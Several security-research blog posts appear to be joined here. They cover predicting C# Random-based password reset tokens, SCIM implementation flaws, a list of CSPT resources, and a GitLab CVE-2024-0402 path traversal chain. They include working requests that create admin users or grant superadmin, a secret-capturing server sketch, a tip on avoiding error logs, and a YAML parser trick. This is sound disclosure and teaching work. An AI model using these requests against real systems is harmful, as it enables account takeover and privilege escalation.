Exploiting random number generators requires math, right? Thanks to C#'s `Random`, that is not necessarily the case! I ran into an HTTP/2 web service issuing password reset tokens from a custom encoding of `(new Random()).Next(min, max)` output. This led to a critical account takeover.
Exploitation required no scripting, math, or libraries: just several clicks in Burp. While I had source code, I will show a method of discovering and exploiting this vulnerability in a black-box or bug-bounty style engagement. The exploit uses no math, but I do like math, so there is a bonus section on how to optimize and invert `Random`.
I can’t share the client code, but it was something like this:
var num = new Random().Next(min, max);
var token = make_password_reset_token(num);
save_reset_token_to_db(user, token);
return issue_password_reset(user.email, token);
This represents a typical password reset. The token is created using `Random()` with no explicit seed, encoded to an alphanumeric token, and sent to the user in email. The user can then log in with their email and token.
This may be trivially exploitable.
Somehow documentation linked me to the following reference implementation. This is not the real implementation, but it's good enough. Don't get into the weeds here; `Random(int Seed)` is only displayed for the sake of context.
public Random()
: this(Environment.TickCount) {
}
public Random(int Seed) {
int ii;
int mj, mk;
//Initialize our Seed array.
//This algorithm comes from Numerical Recipes in C (2nd Ed.)
int subtraction = (Seed == Int32.MinValue) ? Int32.MaxValue : Math.Abs(Seed);
mj = MSEED - subtraction;
SeedArray[55]=mj; // [2]
mk=1;
for (int i=1; i<55; i++) { //Apparently the range [1..55] is special (Knuth) and so we're wasting the 0'th position.
ii = (21*i)%55;
SeedArray[ii]=mk;
mk = mj - mk;
if (mk<0) mk+=MBIG;
mj=SeedArray[ii];
}
for (int k=1; k<5; k++) {
for (int i=1; i<56; i++) {
SeedArray[i] -= SeedArray[1+(i+30)%55];
if (SeedArray[i]<0) SeedArray[i]+=MBIG;
}
}
inext=0;
inextp = 21;
Seed = 1;
}
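As a sanity check, the reference constructor above can be transcribed almost line for line into Python. This is a sketch, assuming the reference source above is faithful (newer .NET Core versions use a different algorithm, as noted later in the post); the `next` method follows the well-known `InternalSample` routine from the same reference source, and `int32` emulates C#'s wrap-around integer arithmetic:

```python
MBIG = 0x7FFFFFFF   # Int32.MaxValue
MSEED = 161803398

def int32(x):
    # emulate C# 32-bit signed int wrap-around
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x >= 0x80000000 else x

class CSharpRandom:
    def __init__(self, seed):
        self.seed_array = [0] * 56
        subtraction = MBIG if seed == -0x80000000 else abs(seed)
        mj = int32(MSEED - subtraction)
        self.seed_array[55] = mj
        mk = 1
        for i in range(1, 55):
            ii = (21 * i) % 55
            self.seed_array[ii] = mk
            mk = int32(mj - mk)
            if mk < 0:
                mk += MBIG
            mj = self.seed_array[ii]
        for _ in range(4):
            for i in range(1, 56):
                v = int32(self.seed_array[i] - self.seed_array[1 + (i + 30) % 55])
                self.seed_array[i] = v + MBIG if v < 0 else v
        self.inext, self.inextp = 0, 21

    def next(self):
        # mirrors Random.InternalSample(), which Next() returns directly
        self.inext = 1 if self.inext >= 55 else self.inext + 1
        self.inextp = 1 if self.inextp >= 55 else self.inextp + 1
        ret = self.seed_array[self.inext] - self.seed_array[self.inextp]
        if ret == MBIG:
            ret -= 1
        if ret < 0:
            ret += MBIG
        self.seed_array[self.inext] = ret
        return ret

# same seed (e.g., the same Environment.TickCount) => identical stream
a, b = CSharpRandom(12345), CSharpRandom(12345)
print([a.next() for _ in range(3)] == [b.next() for _ in range(3)])  # True
```

Two instances built from the same tick produce identical output streams, which is exactly what the attack relies on.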
This whole system hinges on the 32-bit `Seed`. The constructor builds the internal state (`SeedArray[55]`) with some ugly math. If `Random` is initialized without an argument, `Environment.TickCount` is used as the `Seed`. All output of a PRNG is determined by its seed; in this case, the seed is the `TickCount`.
In some sense, you can even submit a time to encode. You do this not with a URL parameter, but by waiting. Wait for the right time and you get the encoding you want. What time, or event, should we wait for?
The documentation says it best.
In .NET Framework, the default seed value is derived from the system clock, which has finite resolution. As a result, different
Random
objects that are created in close succession by a call to the parameterless constructor have identical default seed values and, therefore, produce identical sets of random numbers.
If we submit two requests in the same 1ms window, we get the same `Seed`. Same seed, same output, same reset token sent to two email addresses. One email we own, of course; the other belongs to an admin.
How do we hit the 1ms window? We use the single packet attack.
Will it really work though?
You don’t want to go spamming admins with reset emails before you even verify the vulnerability. So make two accounts on the website that you control. While you can do the attack with one account, it’s prone to false positives. You’re sending two account resets in rapid succession. The second request may write a different reset token to the DB before the email service reads the first, resulting in a false positive.
Use Burp’s repeater groups to perform the single packet attack to reset both accounts. Check your email for duplicate tokens. If you fail, go on testing other stuff until the lockout window dies. Then just hit send again, likely you don’t need to worry about keeping a session token alive.
Note: Burp displays round trip time in the lower-right corner of Repeater.
Keep an eye on that number. Each request has its own time. For me, it took about 10 requests before I got a duplicate token. That only occurred when the difference in round trip times was 1ms or less.
When launching the actual exploit, the only way to check whether your token matches the victim account's is to log in. Login requests tend to be rate limited and guarded, so first verify with your test accounts and use them to obtain a delta-time window that works. Then, when launching the actual exploit, only attempt to log in when the delta time is within your tested bounds.
Ah… I guess subtracting two times counts as math. Exploiting PRNGs always requires math.
This attack is not completely novel. I have seen similar attacks used in CTF’s. It’s a nice lesson on time though. We control time by waiting, or not waiting. If a secret token is just an encoded time, you can duplicate them by duplicating time.
If you look into the .NET runtime enough, you can convince yourself this attack won't work. `Random` has more than one implementation, and the one my client should have used does not seed by time. I can even prove this with dotnetfiddle.
This is like the security version of “it works on my computer”. This is why we
test “secure” code and why we fuzz with random input. So try this exploit next
time you see a security token.
This applies to more than just C#'s `Random`. Consider Python's `uuid`. The documentation warns of potential collisions due to lack of "synchronization" depending on the "underlying platform", unless `SafeUUID` is used. I wonder if the attack will work there? Only one way to find out.
The fix for weak PRNG vulnerabilities is always in the documentation. In this case, you have to click "Supplemental API remarks for Random" in the "Remarks" section to get to the security info, where it says:
To generate a cryptographically secure random number, such as one that's suitable for creating a random password, use one of the static methods in the System.Security.Cryptography.RandomNumberGenerator class.
So in C#, use `RandomNumberGenerator` instead of `Random`.
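For a cross-language comparison (an analogue, not the client's actual stack), Python's counterpart to `RandomNumberGenerator` is the `secrets` module, which draws from the OS CSPRNG instead of a time-seeded PRNG:

```python
import secrets

# A reset token drawn from the OS CSPRNG: unpredictable even if the
# attacker knows exactly when the request was processed.
token = secrets.token_urlsafe(32)
print(len(token))  # 43 URL-safe characters for 32 random bytes
```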
Ahead is some math. It's not too bad, but I figured I would warn you. This is the "hard" way to exploit this finding. I wrote a library that can predict the output of `Random::Next`. It can also invert it, to go back to the seed. Or you can find the first output from the seventh output. None of this requires brute force, just a single modular equation. The code can be found here.
I intended this to be a fun weekend math project. Things got messed up when I found collisions due to an int underflow.
Let's look at the seed algorithm, but try to generalize what you see. The `SeedArray[55]` is obviously the internal state of the PRNG. This is built up with "math". If you look closely, almost every time `SeedArray[i]` is assigned, it's with a subtraction. Right afterward there is always a check: did the subtraction result in a negative number? If so, add `MBIG`. In other words, all the subtraction is done mod `MBIG`.
The `MBIG` value is `Int32.MaxValue`, aka 0x7fffffff, aka 2^31 - 1. This is a Mersenne prime. Doing arithmetic mod a prime results in what math people call a Galois field. We only say that because Évariste Galois was so cool. A Galois field is just a nice way of saying "we can do all the normal algebra tricks we learned since middle school, even though this isn't normal math".
So, let's say `SeedArray[i]` is some `a*Seed + b mod MBIG`. It gets changed in a loop, though, by subtracting some other `c*Seed + d mod MBIG`. We don't need that loop: algebra says the result is just another linear form, `(a-c)*Seed + (b-d) mod MBIG`. By churning through the loop doing algebra, you can get every element of `SeedArray` in the form of `a*Seed + b mod MBIG`.
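A quick sanity check that subtracting one linear form from another (mod `MBIG`) yields another linear form, using hypothetical coefficients just to illustrate the algebra:

```python
MBIG = 2147483647  # the Mersenne prime 2^31 - 1

def linear(coeffs, seed):
    # evaluate a*seed + b (mod MBIG)
    a, b = coeffs
    return (a * seed + b) % MBIG

# two hypothetical SeedArray elements, expressed as linear forms in the seed
f = (12345, 678)
g = (999, 111)

for seed in (0, 1, 42, 2**31 - 2):
    direct = (linear(f, seed) - linear(g, seed)) % MBIG
    merged = linear(((f[0] - g[0]) % MBIG, (f[1] - g[1]) % MBIG), seed)
    print(direct == merged)  # True: subtracting linear forms is again linear
```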
Every time the PRNG is sampled, `Random::InternalSample` is called. That is just another subtraction. The result is both returned and used to set some element of `SeedArray`. It's just some equation again. It's still in the Galois field, it's still just algebra, and you can invert all of these equations. Given one output of `Random::Next`, we can invert the corresponding equation and get the original `Seed`.
But, we can do more too!
The library I made builds `SeedArray` from these equations, and it outputs in terms of these equations. Let's get the equation that represents the first output of `Random` for any `Seed`:
>>> from csharp_rand import csharp_rand
>>> cs = csharp_rand()
>>> first = cs.sample_equation(0)
>>> print(first)
rand = seed * 1121899819 + 1559595546 mod 2147483647
This represents the first output of `Random` for any seed. Use `.resolve(42)` to get the output of `new Random(42).Next()`.
>>> first.resolve(42)
1434747710
Or invert and resolve `1434747710` to find out what seed will produce `1434747710` as the first output of `Random`.
>>> first.invert().resolve(1434747710)
42
This agrees with (dotnetfiddle).
See the readme for more complicated examples.
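For the curious, the `.invert()` call is just one modular inverse in the Galois field. A sketch using the coefficients from the equation printed above:

```python
A, B, MBIG = 1121899819, 1559595546, 2147483647

def first_output(seed):
    # rand = seed * A + B (mod MBIG)
    return (seed * A + B) % MBIG

def seed_from_first_output(rand):
    # MBIG is prime, so A has a modular inverse:
    # seed = (rand - B) * A^-1 (mod MBIG)
    return ((rand - B) * pow(A, -1, MBIG)) % MBIG

print(first_output(42))                     # 1434747710
print(seed_from_first_output(1434747710))   # 42
```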
Having just finished my library, I excitedly showed it to the first person who would listen to me. Of course it failed. There must be a bug and of course I blamed the original implementation. But since account takeover bugs don’t care about my feelings, I fixed the code… mostly…
In short, the original implementation has an int underflow which throws the math equations off for certain seed values. Only certain `SeedArray` elements are affected. For example, the following shows that the first output of `Random` does not need any adjustment, but the 13th output does.
>>> print(cs.sample_equation(0))
rand = seed * 1121899819 + 1559595546 mod 2147483647
>>> print(cs.sample_equation(12))
rand = seed * 1476289907 + 1358625013 mod 2147483647 underflow adjustment: -2
So the 13th output will be `seed * 1476289907 + 1358625013`, unless the seed causes an underflow, in which case it will be off by -2. The code attempts to decide whether the underflow occurs itself. This works great until you invert things. Consider: what seed value will produce 908112456 as the 13th output of `Random::Next`?
>>> cs.sample_equation(12).invert().resolve2(908112456)
(619861032, 161844078)
Both seeds, 619861032 and 161844078, will produce 908112456 on the 13th output (poc). Seed 619861032 does it the proper way, from the non-adjusted equation. Seed 161844078 gets there via the underflow. This "collision" means there are exactly two seeds that produce the same output, so 908112456 is twice as likely to occur on the 13th output as on the first. It also means there is no seed that will produce 908112458 on the 13th output of `Random`. A quick brute force produced some 80K+ other "collisions" just like this one.
Sometimes the smart way is dumb. What started as a fun math thing ended up feeling like death by a thousand cuts. It's better to version match and language match your exploit and get it going fast. If it takes a long time, start optimizing while it's still running. But before you optimize, TEST! Test everything! Otherwise you will run a brute force for hours and get nothing. Why? Well, maybe `Random(Environment.TickCount)` is not `Random()`, because explicitly seeding results in a different algorithm!
Ugh… I am going to go audit some more endpoints…
Single Sign-On (SSO) related bugs have gotten an incredible amount of hype and a lot of amazing public disclosures in recent years; there is a lot of gold out there.
Not surprisingly, systems using a custom implementation are the most affected since integrating SSO with a platform’s User object model is not trivial.
However, while SSO often takes center stage, another standard is often under-tested - SCIM (System for Cross-domain Identity Management). In this blogpost we will dive into its core aspects & the insecure design issues we often find while testing our clients’ implementations.
SCIM is a standard designed to automate the provisioning and deprovisioning of user accounts across systems, ensuring access consistency between the connected parts.
The standard is defined in the following RFCs: RFC7642, RFC7644, RFC7643.
While it is not specifically designed as an IdP-to-SP protocol, but rather as a generic user-pool syncing protocol for cloud environments, real-world deployments mostly embed it in the IdP-SP relationship.
To make a long story short, the standard defines a set of RESTful APIs exposed by the Service Providers (SP) which should be callable by other actors (mostly Identity Providers) to update the users pool.
It provides REST APIs with the following set of operations to edit the managed objects (see scim.cloud):
- Create: POST https://example-SP.com/{v}/{resource}
- Read: GET https://example-SP.com/{v}/{resource}/{id}
- Replace: PUT https://example-SP.com/{v}/{resource}/{id}
- Update: PATCH https://example-SP.com/{v}/{resource}/{id}
- Delete: DELETE https://example-SP.com/{v}/{resource}/{id}
- Search: GET https://example-SP.com/{v}/{resource}?<SEARCH_PARAMS>
- Bulk: POST https://example-SP.com/{v}/Bulk
So, we can summarize SCIM as a set of APIs usable to perform CRUD operations on a set of JSON-encoded objects representing user identities.
Core Functionalities
If you want to look into a SCIM implementation for bugs, here is a list of core functionalities that would need to be reviewed during an audit:
- `&` / `||` (filter expression) safety checks
- `internal` attributes that should not be user-controlled, platform-specific attributes not allowed in SCIM, etc.
- `email` updates should trigger a confirmation flow / flag the user as unconfirmed
- `username` updates should trigger ownership / pending-invitation / re-auth checks, and so on

As direct IdP-to-SP communication, most of the resulting issues will require a certain level of access to either the IdP or the SP. Hence, the attack complexity may lower the severity of most of your findings. Conversely, the impact might skyrocket in multi-tenant platforms, where SCIM users may lack the usual tenant-isolation logic.
The following are some juicy examples of bugs you should look for while auditing SCIM implementations.
A few months ago we published our advisory for Unauthenticated SCIM Operations in Casdoor IdP Instances. Casdoor is an open-source identity solution supporting various auth standards such as OAuth, SAML, OIDC, etc. Of course SCIM was included, but as a service, meaning Casdoor (the IdP) would also allow external actors to manipulate its users pool.
Casdoor utilized the elimity-com/scim library, which, by default, does not include authentication in its configuration as per the standard. Consequently, a SCIM server defined and exposed using this library remains unauthenticated.
server := scim.Server{
Config: config,
ResourceTypes: resourceTypes,
}
Exploiting an instance required emails matching the configured domains. A SCIM POST operation was usable to create a new user matching the internal email domain and data.
➜ curl --path-as-is -i -s -k -X $'POST' \
-H $'Content-Type: application/scim+json' -H $'Content-Length: 377' \
--data-binary $'{\"active\":true,\"displayName\":\"Admin\",\"emails\":[{\"value\":
\"admin2@victim.com\"}],\"password\":\"12345678\",\"nickName\":\"Attacker\",
\"schemas\":[\"urn:ietf:params:scim:schemas:core:2.0:User\",
\"urn:ietf:params:scim:schemas:extension:enterprise:2.0:User\"],
\"urn:ietf:params:scim:schemas:extension:enterprise:2.0:User\":{\"organization\":
\"built-in\"},\"userName\":\"admin2\",\"userType\":\"normal-user\"}' \
$'https://<CASDOOR_INSTANCE>/scim/Users'
Then, authenticate to the IdP dashboard with the new admin user admin2:12345678
.
Note: The maintainers released a new version (v1.812.0), which includes a fix.
While that was a very simple yet critical issue, bypasses could be found in authenticated implementations. In other cases the service could be available only internally and unprotected.
[*] IdP-Side Issues
Since SCIM secrets allow dangerous actions on the Service Providers, they should be protected from extraction after the setup. Testing or editing an IdP SCIM integration on a configured application should require a new SCIM token as input if the connector URL differs from the one previously set.
A famous IdP was found to be issuing the SCIM integration test requests to `/v1/api/scim/Users?startIndex=1&count=1` with the old secret while accepting a new `baseURL`.
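To see why that matters: an attacker who can edit the integration simply points `baseURL` at a server they control and reads the old secret from the incoming test request. A minimal sketch of such a capture endpoint, hypothetical and built on Python's standard library:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

captured = []  # Authorization headers seen by our fake SCIM endpoint

class CaptureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # the IdP's integration test (e.g. GET /v1/api/scim/Users?...)
        # arrives carrying the previously configured secret
        captured.append(self.headers.get("Authorization"))
        body = (b'{"schemas":["urn:ietf:params:scim:api:messages:2.0:ListResponse"],'
                b'"totalResults":0,"startIndex":1,"itemsPerPage":0,"Resources":[]}')
        self.send_response(200)
        self.send_header("Content-Type", "application/scim+json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

# Run with: HTTPServer(("0.0.0.0", 8000), CaptureHandler).serve_forever()
```

Replying with a well-formed empty `ListResponse` keeps the integration test looking successful, which ties into the trace-covering tip below.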
+1 Extra - Covering traces: Avoid logging errors by mocking a response JSON with the expected data for a successful SCIM integration test.
An example mock response JSON for a `Users` query:
{
"Resources": [
{
"externalId": "<EXTID>",
"id": "francesco+scim@doyensec.com",
"meta": {
"created": "2024-05-29T22:15:41.649622965Z",
"location": "/Users/francesco+scim@doyensec.com",
"version": "<VERSION>"
},
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"userName": "francesco+scim@doyensec.com"
}
],
"itemsPerPage": 2,
"schemas": [
"urn:ietf:params:scim:api:messages:2.0:ListResponse"
],
"startIndex": 1,
"totalResults": 8
}
[*] SP-Side Issues
The SCIM token creation & read should be allowed only to highly privileged users. Target the SP endpoints used to manage it and look for authorization issues or target it with a nice XSS or other vulnerabilities to escalate the access level in the platform.
Since ~real-time user access management is the core of SCIM, it is also worth looking for fallbacks causing a deprovisioned user to be back with access to the SP.
As an example, let's look at the `update_scimUser` function below.
def can_be_reprovisioned?(usrObj)
  return true if usrObj.respond_to?(:active) && !usrObj.active?
  false
end

def update_scimUser(usrObj)
  # [...]
  if parser.deprovision_user?
    # [...]
    # (o)__(o)'
  elsif can_be_reprovisioned?(usrObj)
    reprovision(usrObj)
  else
    true
  end
end
Since `respond_to?(:active)` is always true for SCIM identities, the guard reduces to `!usrObj.active?`: if the user is not active, the condition is true, causing re-provisioning.
Consequently, any SCIM update request (e.g., a last-name change) will fall back to re-provisioning if the user was inactive for any reason (e.g., logical ban, forced removal).
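The flawed guard is easy to re-create in a few lines (a Python re-creation of the Ruby logic above, for illustration only):

```python
class ScimUser:
    def __init__(self, active):
        self.active = active

def can_be_reprovisioned(user):
    # mirrors the Ruby guard: hasattr() plays the role of respond_to?,
    # and it is always True for SCIM identities, so the only check
    # that actually matters is "not active"
    return hasattr(user, "active") and not user.active

banned = ScimUser(active=False)   # e.g. logically banned or force-removed
print(can_be_reprovisioned(banned))  # True: any SCIM update re-provisions them
```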
While outsourcing identity syncing to SCIM, it becomes critical to choose what will be copied from the SCIM objects into the new internal ones, since bugs may arise from an “excessive” attribute allowance.
[*] Example 1 - Privesc To Internal Roles
A client supported Okta Groups and Users to be provisioned and updated via SCIM endpoints.
It converted Okta Groups into internal roles with custom labeling to refer to "Okta resources". In particular, the function `resource_to_access_map` constructed an unvalidated access mapping from the supplied SCIM group resource.
[...]
group_data, decode_error := decode_group_resource(resource.Attributes.AsMap())
var role_list []string
// (o)__(o)'
if resource.Id != "" {
role_list = []string{resource.Id}
}
//...
return access_map, nil, nil
The implementation issue resided in the fact that the role names in `role_list` were constructed from an `Id` attribute (`urn:ietf:params:scim:schemas:core:2.0:Group`) passed from a third-party source.
Later, another function upserted the `Role` objects, constructed from the SCIM event, without further checks. Hence, it was possible to overwrite any existing resource in the platform by matching its name in a SCIM Group ID.
As an example, if the SCIM Group resource ID was set to an internal role name, funny things happened.
POST /api/scim/Groups HTTP/1.1
Host: <PLATFORM>
Content-Type: application/json; charset=utf-8
Authorization: Bearer 650…[REDACTED]…
…[REDACTED]…
Content-Length: 283
{
"schemas": ["urn:ietf:params:scim:schemas:core:2.0:Group"],
"id":"superadmin",
"displayName": "TEST_NAME",
"members": [{
"value": "francesco@doyensec.com",
"display": "francesco@doyensec.com"
}]
}
The platform created an access map named `TEST_NAME`, granting the `superadmin` role to its members.
[*] Example 2 - Mass Assignment In SCIM-To-User Mapping
Other internal attributes manipulation may be possible depending on the object mapping strategy. A juicy example could look like the one below.
SSO_user.update!(
external_id: scim_data["externalId"],
# (o)__(o)'
userData: Oj.load(scim_req_body),
)
Even if the `Oj` defaults are overridden (sorry, no deserialization), it is still possible to put arbitrary data in the SCIM request and have it accessible through `userData`, while the logic assumes it will only contain SCIM attributes.
This category contains all the bugs arising from required internal user-management processes not being applied to updates caused by SCIM events (e.g., `email` / `phone` / `userName` verification).
An interesting related finding is GitLab Bypass Email Verification (CVE-2019-5473). We have found similar cases involving the bypass of code verification processes during our assessments as well.
[*] Example - Same-Same But With Code Bypass
A SCIM email change did not trigger the typical confirmation flow required for other email change operations.
Attackers could request a verification code to their email, change the email to a victim one with SCIM, then redeem the code and thus verify the new email address.
PATCH /scim/v2/<ATTACKER_SAML_ORG_ID>/<ATTACKER_USER_SCIM_ID> HTTP/2
Host: <CLIENT_PLATFORM>
Authorization: Bearer <SCIM_TOKEN>
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 205
{
"schemas": ["urn:ietf:params:scim:api:messages:2.0:PatchOp"],
"Operations": [
{
"op": "replace",
"value": {
"userName": "<VICTIM_ADDRESS>"
}
}
]
}
In multi-tenant platforms, the SSO-SCIM identity should be linked to an underlying user object. While it is not part of the RFCs, the management of user attributes such as `userName` and `email` is required to eventually trigger the platform's validation and ownership checks.
A public example case where things did not go well while updating the underlying user is CVE-2022-1680 - Gitlab Account take over via SCIM email change. Below is a pretty similar instance discovered in one of our clients.
[*] Example - Same-Same But Different
A client permitted SCIM operations to change the email of the user and perform account takeover.
The function `set_username` was called on every creation or update of SCIM users.
#[...]
underlying_user = sso_user.underlying_user
sso_user.scim["userName"] = new_name
sso_user.username = new_name
tenant = Tenant.find(sso_user.id)
underlying_user&.change_email!(
new_name,
validate_email: tenant.isAuthzed?(new_name)
)
def underlying_user
return nil if !tenant.isAuthzed?(self.username)
# [...]
# (o)__(o)'
@underlying_user = User.find_by(email: self.username)
end
The `underlying_user` should be `nil`, hence blocking the change, if the organization is not entitled to manage the user according to `isAuthzed`. In our specific case, the authorization function did not protect users in a specific state from being taken over. SCIM could be used to forcefully change the victim user's email and take over the account once it was added to the tenant. If combined with the classic "Forced Tenant Join" issue, a nice chain could have been made.
Moreover, since the platform did not protect against multi-SSO context-switching, once authenticated with the new email, the attacker could have access to all other tenants the user was part of.
As per rfc7644, the Path attribute is defined as:
The “path” attribute value is a String containing an attribute path describing the target of the operation. The “path” attribute is OPTIONAL for “add” and “replace” and is REQUIRED for “remove” operations.
As the `path` attribute is OPTIONAL, the `nil` possibility should be carefully managed when it is part of the execution logic.
def exec_scim_ops(scim_identity, operation)
path = operation["path"]
value = operation["value"]
case path
when "members"
# [...]
when "externalId"
# [...]
else
# semi-Catch-All Logic!
end
end
Putting a catch-all default could allow another syntax of `PatchOp` messages to still hit one of the restricted cases while skipping the checks. Here is an example SCIM request body that would skip the `externalId` checks and edit it within the context above.
{
"schemas": ["urn:ietf:params:scim:api:messages:2.0:PatchOp"],
"Operations": [
{
"op": "replace",
"value": {
"externalId": "<ID_INJECTION>"
}
}
]
}
The `value` of an op is allowed to contain a dict of `<Attribute:Value>` pairs.
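The bypass is easy to reproduce with a toy dispatcher (hypothetical code, mirroring the structure of the Ruby `case` above):

```python
def exec_scim_op(identity, operation):
    # "path" is OPTIONAL for add/replace operations per RFC 7644
    path = operation.get("path")
    value = operation["value"]
    if path == "externalId":
        raise PermissionError("externalId edits are restricted")
    elif path == "members":
        raise PermissionError("members edits are restricted")
    else:
        # semi-catch-all: when "path" is absent, value is a dict of
        # attributes, so restricted attributes slip through unchecked
        identity.update(value)

identity = {}
exec_scim_op(identity, {
    "op": "replace",
    "value": {"externalId": "<ID_INJECTION>"},
})
print(identity)  # {'externalId': '<ID_INJECTION>'}
```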
Since bulk operations may be supported (currently in very few cases), specific issues can arise in those implementations:
- Race Conditions: the ordering logic might not account for the extra processes triggered in each step
- Missing Circular Reference Protection: RFC 7644 explicitly covers Circular Reference Processing
Since SCIM adopts JSON for data representation, JSON interoperability attacks could lead to most of the issues described in the hunting list. A well-known starting point is the article An Exploration of JSON Interoperability Vulnerabilities.
Once the parsing lib used in the SCIM implementation is discovered, check if other internal logic is relying on the stored JSON serialization while using a different parser for comparisons or unmarshaling.
Despite being a relatively simple format, JSON parser differentials can lead to interesting cases.
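A classic example of such a differential is duplicate-key handling. Python's `json`, for instance, keeps the last occurrence of a key, while a parser (or validation layer) that keeps the first would see a different value:

```python
import json

doc = '{"userName": "victim@example.com", "userName": "attacker@example.com"}'

# Python's json keeps the LAST duplicate key...
print(json.loads(doc)["userName"])  # attacker@example.com

# ...while a component that reads the first pair would validate the victim
pairs = json.loads(doc, object_pairs_hook=lambda p: p)
print(pairs[0])  # ('userName', 'victim@example.com')
```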
As an extension of SSO, SCIM has the potential to enable critical exploitations under specific circumstances. If you’re testing SSO, SCIM should be in scope too!
Finally, most of the interesting vulnerabilities in SCIM implementations require a deep understanding of the application’s authorization and authentication mechanisms. The real value lies in identifying the differences between SCIM objects and the mapped internal User objects, as these discrepancies often lead to impactful findings.
As a follow up to Maxence Schmitt’s research on Client-Side Path Traversal (CSPT), we wanted to encourage researchers, bug hunters, and security professionals to explore CSPT further, as it remains an underrated yet impactful attack vector.
To support the community, we have compiled a list of blog posts, vulnerabilities, tools, CTF challenges, and videos related to CSPT. If anything is missing, let us know and we will update the post. Please note that the list is not ranked and does not reflect the quality or importance of the resources.
We hope this collection of resources will help the community to better understand and explore Client-Side Path Traversal (CSPT) vulnerabilities. We encourage anyone interested to take a deep dive into exploring CSPT techniques and possibilities and helping us to push the boundaries of web security. We wish you many exciting discoveries and plenty of CSPT-related bugs along the way!
This research project was made with ♡ by Maxence Schmitt, thanks to the 25% research time Doyensec gives its engineers. If you would like to learn more about our work, check out our blog, follow us on X, Mastodon, BlueSky or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.
I know, we have written it multiple times now, but in case you are just tuning in, Doyensec had found themselves on a cruise ship touring the Mediterranean for our company retreat. To kill time between parties, we had some hacking sessions analyzing real-world vulnerabilities resulting in the !exploitable blogpost series.
In Part 1 we covered our journey into IoT ARM exploitation, while Part 2 followed our attempts to exploit the bug used by Trinity in The Matrix Reloaded movie.
For this episode, we will dive into the exploitation of CVE-2024-0402 in GitLab. Like an onion, there is always another layer beneath the surface of this bug, from YAML parser differentials to path traversal in decompression functions in order to achieve arbitrary file write in GitLab.
No public Proof of Concept was published, and building one turned out to be an adventure, deserving an extension of the original author's blogpost with the PoC-related info to close the circle 😉
This vulnerability impacts the GitLab Workspaces functionality. To make a long story short, it lets developers instantly spin up integrated development environments (IDEs) with all dependencies, tools, and configurations ready to go.
The whole Workspaces functionality relies on several components, including a running Kubernetes GitLab Agent and a devfile configuration.
Kubernetes GitLab Agent: The Kubernetes GitLab Agent connects GitLab to a Kubernetes cluster, allowing users to enable deployment process automations and making it easier to integrate GitLab CI/CD pipelines. It also allows Workspaces creation.
Devfile: An open standard defining containerized development environments. In short, it is configured with YAML files used to define the tools, runtime, and dependencies needed for a certain project.
Example of a devfile configuration (to be placed in the GitLab repository as `.devfile.yaml`):
apiVersion: 1.0.0
metadata:
name: my-app
components:
- name: runtime
container:
image: registry.access.redhat.com/ubi8/nodejs-14
endpoints:
- name: http
targetPort: 3000
Let’s start with the publicly available information enriched with extra code-context.
GitLab was using the `devfile` Gem (Ruby, of course), which calls the external `devfile` binary (written in Go) to process the `.devfile.yaml` files during Workspace creation in a specific repository.
During the devfile pre-processing routine applied by Workspaces, a specific validator named `validate_parent` was called by `PreFlattenDevfileValidator` in GitLab.
# gitlab-v16.8.0-ee/ee/lib/remote_development/workspaces/create/pre_flatten_devfile_validator.rb:50
...
def self.validate_parent(value)
value => { devfile: Hash => devfile }
return err(_("Inheriting from 'parent' is not yet supported")) if devfile['parent']
Result.ok(value)
end
...
But what is the `parent` option? As per the Devfile documentation:
If you designate a parent devfile, the given devfile inherits all its behavior from its parent. Still, you can use the child devfile to override certain content from the parent devfile.
Then, it proceeds to describe three types of `parent` references:
As with any other remote-fetching functionality, it would be worth reviewing for bugs. But at first glance, the option seems to be blocked by `validate_parent`.
As widely known, even the most used implementations of specific standards may have minor deviations from what was defined in the specification. In this specific case, a YAML parser differential between Ruby and Go was needed.
The author blessed us with a new trick for our differentials notes. In the YAML Spec:
- `!` is used for custom or application-specific data types: `my_custom_data: !MyType "some value"`
- `!!` is used for built-in YAML types: `bool_value: !!bool "true"`
He found out that the local YAML tag notation `!` (RFC reference) still activates the `binary` format base64 decoding in the Ruby `yaml` lib, while the Go `gopkg.in/yaml.v3` simply drops it, leading to the following behavior:
➜ cat test3.yaml
normalk: just a value
!binary parent: got injected
### valid parent option added in the parsed version (!binary dropped)
➜ go run g.go test3.yaml
parent: got injected
normalk: just a value
### invalid parent option as Base64 decoded value (!binary evaluated)
➜ ruby -ryaml -e 'x = YAML.safe_load(File.read("test3.yaml"));puts x'
{"normalk"=>"just a value", "\xA5\xAA\xDE\x9E"=>"got injected"}
Consequently, it was possible to sneak a devfile with a `parent` option past the `validate_parent` function and reach the `devfile` binary execution with it.
At this point, we need to switch to a bug discovered in the `devfile` binary (Go implementation).
After looking into a dependency of a dependency of a dependency, the hunter got his hands on the `decompress` function. It takes tar.gz archives from the registry's library and extracts the files on the GitLab server; later, they are moved into the deployed Workspace environment.
Here is the vulnerable decompression function used by getResourcesFromRegistry
:
// decompress extracts the archive file
func decompress(targetDir string, tarFile string, excludeFiles []string) error {
var returnedErr error
reader, err := os.Open(filepath.Clean(tarFile))
...
gzReader, err := gzip.NewReader(reader)
...
tarReader := tar.NewReader(gzReader)
for {
header, err := tarReader.Next()
...
target := path.Join(targetDir, filepath.Clean(header.Name))
switch header.Typeflag {
...
case tar.TypeReg:
/* #nosec G304 -- target is produced using path.Join which cleans the dir path */
w, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode))
if err != nil {
returnedErr = multierror.Append(returnedErr, err)
return returnedErr
}
/* #nosec G110 -- starter projects are vetted before they are added to a registry. Their contents can be seen before they are downloaded */
_, err = io.Copy(w, tarReader)
if err != nil {
returnedErr = multierror.Append(returnedErr, err)
return returnedErr
}
err = w.Close()
if err != nil {
returnedErr = multierror.Append(returnedErr, err)
return returnedErr
}
default:
log.Printf("Unsupported type: %v", header.Typeflag)
}
}
return nil
}
The function opens tarFile and iterates through its contents with tarReader.Next(). Only entries of type tar.TypeDir and tar.TypeReg are processed, preventing symlink and other nested exploitations.
Nevertheless, the line target := path.Join(targetDir, filepath.Clean(header.Name)) is vulnerable to path traversal for the following reasons:
- header.Name comes from a remote tar archive served by the devfile registry
